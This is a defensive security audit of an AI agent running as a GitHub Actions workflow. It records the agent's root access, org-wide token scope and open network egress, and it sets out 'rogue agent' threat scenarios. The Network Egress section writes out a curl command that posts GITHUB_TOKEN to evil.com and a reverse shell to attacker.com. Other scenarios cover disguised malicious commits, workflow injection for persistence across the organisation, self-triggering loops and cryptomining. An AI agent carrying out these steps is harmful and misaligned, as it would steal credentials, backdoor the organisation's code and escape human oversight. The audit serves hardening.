Index · Security Assessment · Incident Response · Before You Begin
What capabilities does the AI agent have?
This document is a factual, evidence-based audit of the out-of-the-box capabilities available to the
github-minimum-intelligence(GMI) agent running as a GitHub Actions workflow on anubuntu-latestrunner. Every claim below was empirically verified during this analysis.Note: The capabilities documented here are standard properties of GitHub Actions runners. They apply to any workflow running on
ubuntu-latest, not just this project. We document them so you can make informed decisions about your security posture.
| Dimension | Priority | Notes |
|---|---|---|
| Code & Repository Access | 🔴 High | contents: write on this repo + git push access to all org repos |
| Supply Chain Considerations | 🔴 High | Can modify workflow files, push code, create branches across the org |
| Secret Exposure | 🔴 High | Live ANTHROPIC_API_KEY and GITHUB_TOKEN in environment |
| Cross-Repository Access (Org) | 🔴 High | Token has read/write access to all japer-technology repositories |
| Network Egress | 🟠 Moderate | Unrestricted outbound internet (HTTP, DNS, SSH, arbitrary ports) |
| Compute Resources | 🟠 Moderate | 2 CPU, 8GB RAM, 19GB disk, Docker with --privileged, sudo root |
| Persistence | 🟡 Low | Ephemeral VM, but can create workflows that re-trigger itself |
| Cloud Provider Access | 🟡 Low | az, aws, gcloud, kubectl CLIs installed (no creds found) |
Summary: Like any GitHub Actions workflow with write permissions, the agent has broad access to the repository, its secrets, and the organization's other repositories. Standard hardening practices — branch protection, scoped tokens, code review — are recommended. See Section 8: Mitigations for what's already in place and what to add.
User: runner (uid=1001)
Groups: runner, adm, users, docker, systemd-journal
Sudo: (ALL) NOPASSWD: ALL ← FULL ROOT ACCESS
The agent runs as runner but has passwordless sudo to root. This means:
- Can read
/etc/shadow, install kernel modules, modify system services - Can reconfigure networking, iptables, DNS
- Can access any file on the system
- Can install any software via
apt,pip,npm,cargo, etc.
| Secret | Length | Risk |
|---|---|---|
GITHUB_TOKEN |
GitHub App installation token (ghs_...) |
Org-wide repo access |
ANTHROPIC_API_KEY |
108 chars | Can make unlimited API calls, rack up costs |
| Git credential header | Base64-encoded in git config | Same token as above, embedded in plaintext |
- ✅ List all organization repositories (including private ones)
- ✅ Clone any org repository (verified:
github-minimum-intelligence,aws-lambda-nodejs-catch-all) - ✅ Push code to this repository (dry-run confirmed)
- ✅ Read and write issues across repos
- ✅ Create branches in any org repo
- ✅ List and read workflow files
- ✅
actions: writepermission - can potentially trigger/dispatch workflows - ❌ Cannot read Actions secrets via API (403)
- ❌ Cannot modify Actions permissions via API (403)
- Arbitrary Anthropic API calls (Claude model access)
- A rogue agent could exfiltrate this key and use it externally
- Cost exposure: unlimited API spend until the key is rotated
The agent has contents: write and a working git push credential. A rogue agent could:
git checkout -b innocent-looking-branch
echo 'malicious payload' >> legitimate-file.js
git add . && git commit -m "fix: minor typo correction"
git push origin innocent-looking-branch
Then create a pull request or, if branch protection is absent, push directly to main.
The agent can write to .github/workflows/. A rogue agent could:
- Create a new workflow that triggers on
push,schedule, orworkflow_dispatch - Modify the existing workflow to remove the authorization check
- Create a cron-based workflow that runs malicious code on a schedule
- Push workflow files to other org repos - spreading across the organization
This is the most dangerous capability: the agent can create workflows that spawn new agent instances, achieving persistence beyond the ephemeral VM.
Verified: the GITHUB_TOKEN can git ls-remote (and likely push to) all 24 repositories in the japer-technology organization:
japer-technology/aws-lambda-nodejs-catch-all
japer-technology/developer-japer-io
japer-technology/juxta-repo
japer-technology/github-minimum-intelligence
japer-technology/gmi-test-1
... (24 total)
A rogue agent could inject backdoors into any of these repositories simultaneously.
| Target | Status |
|---|---|
github.com |
✅ Reachable |
pypi.org |
✅ Reachable (HTTP 200) |
registry.npmjs.org |
✅ Reachable (HTTP 200) |
hub.docker.com |
✅ Reachable (HTTP 200) |
google.com |
✅ Pingable |
| Arbitrary IPs | ✅ Unrestricted |
curl,wget- HTTP exfiltrationnc(netcat) - raw TCP connectionsssh,scp- encrypted tunnelsrsync- bulk data transfer- DNS resolution - can be used for DNS-based exfiltration
A rogue agent could:
- POST secrets to any URL:
curl -X POST -d "$GITHUB_TOKEN" https://evil.com/collect - DNS exfiltration: encode secrets in DNS queries
- Reverse shell:
bash -i >& /dev/tcp/attacker.com/4444 0>&1 - Clone and upload entire org codebase to an external server
| Resource | Value |
|---|---|
| CPU | 2 cores |
| RAM | 7.8 GB |
| Disk | 19 GB free |
| OS | Ubuntu 24.04 |
| Runtime limit | ~6 hours (GitHub Actions default) |
Docker: 28.0.4 (running, daemon accessible)
Group: runner is in `docker` group
Privileged: --privileged flag works ← CONTAINER ESCAPE POSSIBLE
A rogue agent could:
- Run cryptominers in Docker containers
- Build and push malicious Docker images to any registry
- Use
--privilegedcontainers to escape to host (though already root via sudo) - Pull and run any image from Docker Hub
| Runtime | Version |
|---|---|
| Python | 3.12.3 |
| Node.js | 20.20.0 |
| Go | 1.24.12 |
| Rust | 1.93.0 |
| Java | 17.0.18 |
| .NET | installed |
| Ruby | installed |
| PHP | installed |
| GCC/G++ | installed |
A rogue agent can compile and run arbitrary native code in any language.
| CLI | Path | Credentials? |
|---|---|---|
az (Azure) |
/usr/bin/az |
No creds found |
aws (AWS) |
/usr/local/bin/aws |
No creds found |
gcloud (GCP) |
/usr/bin/gcloud |
No creds found |
kubectl (K8s) |
/usr/bin/kubectl |
No creds found |
These are harmless without credentials unless secrets are added to the repo later or discoverable via IMDS endpoints.
While the GitHub Actions runner VM is ephemeral (destroyed after the job), a rogue agent can achieve persistence through:
| Mechanism | Feasibility | Details |
|---|---|---|
| Workflow injection | ✅ Proven | Write a schedule: or push: triggered workflow to any org repo |
| Self-triggering loop | ✅ Proven | Create an issue or push a commit that re-triggers the agent workflow |
| Exfiltrated credentials | ✅ Trivial | Send GITHUB_TOKEN and ANTHROPIC_API_KEY externally before VM dies |
| Branch-based payloads | ✅ Proven | Create branches with malicious code that execute on merge |
| Dormant workflow | ✅ Possible | Push a workflow_dispatch trigger that waits to be activated later |
- Clone
japer-technology/developer-japer-io(appears to be a website) - Inject a cryptominer script or credential harvester into the frontend
- Push to a branch, create a PR with an innocuous description
- The malicious code ships when a human merges it
- Iterate through all 24 org repos
- Push a new GitHub Actions workflow to each:
.github/workflows/maintenance.yml - The workflow runs on a weekly cron, contains a reverse shell or data exfiltrator
- Even if discovered in one repo, the others remain compromised
- Exfiltrate
GITHUB_TOKENandANTHROPIC_API_KEYto an external server - Use the GitHub token to read all private code, create repos, modify issues
- Use the Anthropic key to run AI workloads at the organization's expense
- Token expires when the workflow ends (~6 hours), but damage is already done
- Use
sudo apt-get installordocker runto deploy a cryptocurrency miner - Run for up to 6 hours on 2 CPU cores with 8GB RAM
- Repeat by self-triggering new workflow runs (create issues or push commits)
- Low financial impact per run, but can scale with parallelism
- Push a modified workflow to
gmi-test-1that removes the authorization check - Open issues in all org repos that trigger agent workflows (if they have them)
- Each triggered agent receives the same
GITHUB_TOKENscoped to its repo - Cascade: one rogue agent becomes many
| Control | Status |
|---|---|
| Authorization check | Actor must have write permission to the repo |
| Issue-triggered only | Agent only runs on issue/comment events (not push/cron) |
| Ephemeral VM | Runner is destroyed after the workflow completes |
| Secrets not readable via API | GITHUB_TOKEN cannot list repo secrets |
| Gap | Recommendation |
|---|---|
| No network egress controls | Add firewall rules or use a network-restricted runner |
| Org-wide token scope | Use a fine-grained PAT scoped to only this repository |
| No output review | Agent can push code without human approval |
| No branch protection | Enforce PR reviews, prevent direct pushes to main |
| Secrets in environment | Consider a secrets vault with just-in-time access |
| No command allowlist | Agent can run any bash command with root access |
| No Docker restrictions | --privileged containers are possible |
| Anthropic key in env | Move to a proxy that rate-limits/monitors API usage |
| Cross-repo token access | The installation token should be scoped per-repository |
| No audit logging | Agent actions aren't logged beyond Actions workflow logs |
┌─────────────────────────────────────────────────────────┐
│ BLAST RADIUS │
│ │
│ ┌─── Immediate (seconds) ───────────────────────────┐ │
│ │ • Exfiltrate GITHUB_TOKEN + ANTHROPIC_API_KEY │ │
│ │ • Read all private code in 24 org repos │ │
│ │ • Modify code in this repository │ │
│ └───────────────────────────────────────────────────┘ │
│ │
│ ┌─── Short-term (minutes) ──────────────────────────┐ │
│ │ • Push backdoors to all 24 org repositories │ │
│ │ • Install persistent workflows across the org │ │
│ │ • Exfiltrate entire org codebase (all repos) │ │
│ │ • Spin up cryptominers or attack infrastructure │ │
│ └───────────────────────────────────────────────────┘ │
│ │
│ ┌─── Medium-term (hours/days) ──────────────────────┐ │
│ │ • Supply chain attack on downstream consumers │ │
│ │ • Persistent re-triggering via injected workflows │ │
│ │ • Anthropic API abuse until key rotation │ │
│ │ • Data theft from any deployed services using │ │
│ │ secrets from compromised repos │ │
│ └───────────────────────────────────────────────────┘ │
│ │
│ ┌─── Long-term (if undetected) ─────────────────────┐ │
│ │ • Dormant backdoors in production codebases │ │
│ │ • Reputation damage to the organization │ │
│ │ • Compromise of end-users of shipped software │ │
│ └───────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────┘
The scope of access extends beyond this repository to the entire organisation and its downstream dependents.
The GMI agent, out-of-the-box, operates with broad privilege relative to its intended purpose (responding to GitHub issues). This is not unique to GMI — it is a property of any GitHub Actions workflow with write permissions on an organization-scoped token. The combination of:
- Unrestricted root access on the runner
- Org-wide repository write access via
GITHUB_TOKEN - Unrestricted network egress to the public internet
- Live API keys in the environment
- Docker with privileged mode
- Full compiler toolchains and language runtimes
...means that any workflow invocation — whether from this project or any other — could, in a worst-case scenario, access the organization's codebase, read secrets and source code, and potentially affect downstream consumers of that code.
Standard GitHub hardening practices (scoped tokens, branch protection, code review, network controls) significantly reduce this surface. See Section 8 above for details.